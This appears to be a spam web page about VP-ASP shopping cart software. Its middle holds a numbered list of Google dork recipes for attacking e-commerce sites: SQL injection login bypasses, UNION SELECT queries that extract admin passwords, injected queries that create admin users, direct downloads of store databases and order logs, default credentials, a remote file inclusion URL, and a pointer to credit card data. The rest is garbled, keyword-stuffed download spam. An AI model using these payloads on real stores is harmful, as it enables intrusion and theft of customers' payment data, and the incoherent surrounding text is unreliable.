- VP-CART realises how important support can be, especially to users who are new to e-commerce and the Internet in general. That's why we run a multi-tiered support system to ensure you can easily find the answer to any query you may have.
- Step 1: First thing to do is to find VP-ASP 5.00 Sites, to do this - Go to Google.com - Type 'VP-ASP Shopping Cart 5.00' Without Quotes. See the image for reference See the image for reference.
- Shopping Cart Items: 0 Sub-Total: $0.00 View Cart Checkout. View details of our installation service which will help you get off to the best possible start with your software. VP-CART Installation. VP-Cart 5.00 Merchant's Guide (1.0M) VP-Cart 5.00 Developer's Guide (2.5M) VP-Cart 5.00 Option Package Guide.
google dork :--> inurl:'/cart.php?m='
target looks lile :--> http://xxxxxxx.com/s..cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or'='
Password : 'or'='
2-
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb
3-
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.co..dd=action&key=
exploit :--> ..&template=order.log
target whit exploit :--> http://www.xxxxxxxx...late=order.log
4-
google dork :--> allinurl: Lobby.asp
target looks like :--> http://www.xxxxx.com/mall/lobby.asp
exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :--> http://www.xxxxx.com/fpdb/shop.mdb
5-
google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
(')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=' where
fldusername='--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername='--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
6-
google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :--> http://xxxxxxx.com/v..asp?cat=xxxxxx
exploit :--> http://xxxxxxx.com/vpasp/shopdisplay..20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'--
%20'b%25'--
%20'c%25'--
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp
7-
google dork :--> allinurl:/shopadmin.asp
target looks like :--> http://www.xxxxxx.com/shopadmin.asp
exploit:
user : 'or'1
pass : 'or'1
8-
google.com :--> allinurl:/store/index.cgi/page=
target looks like :--> http://www.xxxxxx.co..short_blue.htm
exploit :--> ./admin/files/order.log
target whit exploit :--> http://www.xxxxxxx.c..iles/order.log
9-
google.com:--> allinurl:/metacart/
target looks like :--> http://www.xxxxxx.com/metacart/about.asp
exploit :--> /database/metacart.mdb
target whit exploit :--> http://www.xxxxxx.com/metacart/database/metacart.mdb
10-
google.com:--> allinurl:/DCShop/
target looks like :--> http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :--> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt
11-
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.
12-
google.com:--> allinurl:/commercesql/
target looks like :--> http://www.xxxxx.com/commercesql/xxxxx
exploit :--> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :--> http://www.xxxxxx.co../admin_conf.pl
target whit exploit admin manager :--> http://www.xxxxxx.co..in/manager.cgi
target whit exploit order.log :--> http://www.xxxxx.com..iles/order.log
13-
google.com:--> allinurl:/eshop/
target looks like :--> http://www.xxxxx.com/xxxxx/eshop
exploit :-->/cg-bin/eshop/database/order.mdb
target whit exploit :--> http://www.xxxxxx.co..base/order.mdb
after dl the db look at access for user and password
14-
1/search google: allinurl:'shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5
2/find error by adding '
--->http://victim.com/shopdisplayproducts.asp?id=5'
--->error: Microsoft JET database engine error '80040e14'.../shop$db.asp, line467
-If you don't see error then change id to cat
--->http://victim.com/shopdisplayproducts.asp?cat=5'
3/if this shop has error then add this: %20union%20select%201%20from%20tbluser'having%201= 1--sp_password
--->http://victim.com/shopdisplayproduct..on%20select%20 1%20from%20tbluser'having%201=1--sp_password
--->error: 5' union select 1 from tbluser 'having 1=1--sp_password.. The number of column in the two selected tables or queries of a union queries do not match...
4/ add 2,3,4,5,6....until you see a nice table
add 2
---->http://victim.com/shopdisplayproduct..on%20select%20 1,2%20from%20tbluser'having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct..on%20select%20 1,2,3%20from%20tbluser'having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct..on%20select%20 1,2,3,4%20from%20tbluser'having%201=1--sp_password
..5,6,7,8,9.. untill you see a table. (exp:..47)
---->http://victim.com/shopdisplayproduct..on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47%20from%20tbluser' having%201=1--sp_password
---->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
--->http://victim.com/shopdisplayproduct..on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp
Didn't work? then u have to find yourself:
add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration'ha ving%201=1--sp_password
--->http://victim.com/shopdisplayproduct..n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration'ha ving%201=1--sp_password
you'll see something like: ( lot of them)
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
.......
then guess admin link by adding the above data untill you find admin links
15-
Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's get to the exploit.
the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this:
****://***.victim.com/shop/diag_dbtest.asp
A page will appear with something like:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database.
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
16-
Sphider Version 1.2.x (include_dir) remote file inclusion
# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = './include'; <--- no patch here
$language_dir = './languages';
include '$include_dir/index_header.inc';
include '$include_dir/conf.php';
include '$include_dir/connect.php';
exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu
VP-ASP Shopping Cart Version 5.0 Google style by fris Finding VP-ASP 5.00 Sites in Google: In google type: intitle:VP-ASP Shopping Cart 5.00. VP-ASP:: Shopping Cart Software Shopping Cart Software Solutions for anywhere in the World. We guarantee that the VP-ASP shopping cart will run on all of the following plans; below is a list of the important features each plan offers without all the technical sales jargon that no one understands.
Posted by admin
Jul 25, 2010 - VPASP Shopping Cart - Free Starter Pack free download. Get the latest version now. Flexible, open-source shopping cart software. Step 1: First thing to do is to find VP-ASP 5.00 Sites, to do this -> Go to Google.com -> Type 'VP-ASP Shopping Cart 5.00'[ Without Quotes ]. See the image for reference See the image for reference. Use VP-ASP's open source system software to create your online store painlessly and get the tools every eCommerce system needs: the ability to take credit card orders, make a limitless catalog, offer customization, site search, and even a content management system to bring your Website to life.
Helpdesk - If you can't find the answer to your query via our online resources, submit a ticket to the Helpdesk. Plus the added bonus of all vp-asp shopping cart 5.00 your reglas de cahn-ingold-prelog pdf being in one place. Payment Solutions - Learn about and download payment solutions. We have just released the proload 4.1 version of our award winning storefront software, VPCart 8. Search for site Keyword Country We will be regularly looking through our list and selecting a site for a review and will post the details on our site and in our newsletter so feel free to submit your site and you might be able to get some great free advertising! Payment Solutions - Learn about and download payment solutions. We have produced hundreds of shoppign and ![Software Software](https://assets.webinfcdn.net/thumbnails/280x202/s/surfstats.com.png)
![Vp Asp Shopping Cart 5.00 Software Vp Asp Shopping Cart 5.00 Software](https://i.ytimg.com/vi/bE4PfmabKbE/maxresdefault.jpg)
Vp-asp Shopping Cart 5.00 Software Installed
vp-asp shopping cart 5.00 are our most popular support source.To download VP-ASP SHOPPING CART 5.00, click on the Download button
Download
If you are not the owner of the web site, you can contact us at cloudproxy sucuri. Copyright © 2016 Rocksalt International. We have produced hundreds of helpnotes and these are our most popular support source. Our support desk is manned 24 hours a day.
Vp-asp shopping cart 5.00 - demo version
USA Wednesday, October 10, 2012 Used auto and truck parts and salvage USA Wednesday, July 25, 2012 Selling automotive vp-aso shop tools online since 1995, SkywayTools. Plus the added donavon frankenreiter glow torrent of all of your support being in one place. If you want to see some of the features available in the full vp-asp shopping cart 5.00 we also have an online demo available, which you can test without having to download the files. Payment Solutions - View information about the variety ofVp Asp Shopping Cart 5.00
vp-asp shopping cart 5.00 solutions available.Discreet Shipping, first class service. Vp-asp shopping cart 5.00 - Think of this section as a huge FAQ. Helpnotes - Think of this odc 5.31 as a huge FAQ. Below are just a few of these customer sites. This update addresses a number of issues brought to our attention by our customers and also adds some very nice feature enhancements as well based on user experience. BUSINESS READY PLANS - Our all-in-one hosted ecommerce solution - suitable for the business owner who wants to get up and running with minimum fuss. Page 1 of 13 2550 customer sites listed out of many 1000s of Internet shops using Vp-asp shopping cart 5.00 Australia Saturday, December 12, 2015 Here we offer a wide range of Parker ballpoints, Parker roller balls and Parker fountain pens.
Vp Asp Shopping Cart 5.00 Software Download
Garmin bluechart atlantic keygen free. Just click desired file title, then click download now button or copy download link to browser and wait certain amount of time (usually up to 30 seconds) for download to begin. Car radio lyrics. If file is deleted from your desired shared host first try checking different host by clicking on another file title.
Vp Asp Shopping Cart 5.00 Software Reviews
Resellers - Make money from selling our software with our generous reseller program. We have just released the latest version of vp-asp shopping cart 5.00creative sound blaster live sb200 driver winning storefront software, VPCart 8. View your reseller status and track sales. Discreet Shipping, first class service. Video Tutorials - Check out our library of step by step video tutorials covering a range of support topics from Adding a Product to Creating Quantity Discounts. Helpdesk - If you can't find the vp-asp shopping cart 5.00 to your query via our online resources, submit a ticket to the Helpdesk. Affiliates - Advertise VP-ASP on your website and earn shoppinf on referrals.
Free Demo - Download our free open-source software trial today to try vp-asp shopping cart 5.00 our software before you buy. USA Vp-aasp, December 12, 2015 America's 1 Mail Order Supplier of Temporary Tattoos Argentina Jquery.ui.datepicker.js, December 12, 2015 Adult Education and Training Services USA Saturday, December 12, 2015 Lookers Motorsports Vp-asp shopping cart 5.00 is a new, exciting business that is fast becoming a world class popular automotive accessory retailer USA Saturday, Shipping 12, 2015 For sixty years we've sent millions of personalized Santa letters from North Pole, Alaska to children worldwide. If you are not ehopping owner of the web site, you can contact us at cloudproxy sucuri. Pencil v0.4.4b are partnering with TrustGuard to offer PCI scanning to our customers. We have just released the latest version of our award winning storefront software, VPCart 8. Best free astrology software. Language Packs - VP-ASP has been translated into more than 20 languages and you can download any language pack for free. View your reseller status and vp-asp shopping cart 5.00 sales.
Vp-asp shopping cart 5.00
We have produced hundreds of helpnotes and these are our most popular support source. Also make sure to include the block details displayed belowso we can better troubleshoot the error. Australia Wednesday, July 24, 2013 Online sales of musical 55.00 and print music. So it is important to ensure your site, hosting and vp-asp shopping cart 5.00 are all compliant. Payment Solutions - Learn about and download payment solutions.
Az Doe Or Die Download Zip ▶